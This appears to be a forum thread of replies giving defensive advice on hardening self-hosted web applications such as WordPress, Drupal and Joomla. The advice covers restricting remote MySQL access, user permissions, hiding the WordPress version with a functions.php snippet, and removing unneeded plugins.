And, like you said, securing your server is nice : no remote SQL access, for instance ; checking the provileges of each user on the system, too ; keeping your software up to date, ...

If you're super paranoid, would be to setup the application in a sandbox and have apache proxy over to it. But that's pretty much over-kill unless you have a lot of sensitive data and/or are truly paranoid and/or have been broken into before.
If the application allows it changing the admin path is generally a good idea too. For example, it's pretty easy with a search-replace to change Wordpresses default admin from /wp-admin to something else entirely (like /my-admin for example). This isn't always possible though.
You'll also want to thoroughly check any user roles and permissions that can be set with in the application its self. For example, Drupal has a pretty robust user access system. But you need to make sure you don't give any users access they don't
Other things include disabling, or deleting, any modules/extensions/plugins that are not 100% necessary to the operation of the system. Personally checking all MySQL users to make sure no one can connect to the server remotely. You can also setup a chroot jail for all users on the server (except root of course) so they're locked into a directory and can't get out of it.

See Hardening Wordpress and Hardening Wordpress with htaccess at the wordpress.org codex.
In Wordpress, put this
function remove_header_info() {
remove_action('wp_head', 'wp_generator');
}
add_action('init', 'remove_header_info');
in the theme's functions.php file to remove the WP version from being output by wp_head in header.php.

In Joomla, I would change the database prefix to something different to jos_ .

I've found two interesting links that can add information about Wordpress.
This first one is from Wordpress blog itself, saying that you should always keep your installation up to date with all the security fixes.
The second one is a great list from a lot of steps (from configuration to pugins) that I believe is really well written and with a lot of interesting advices (it's divided in two parts).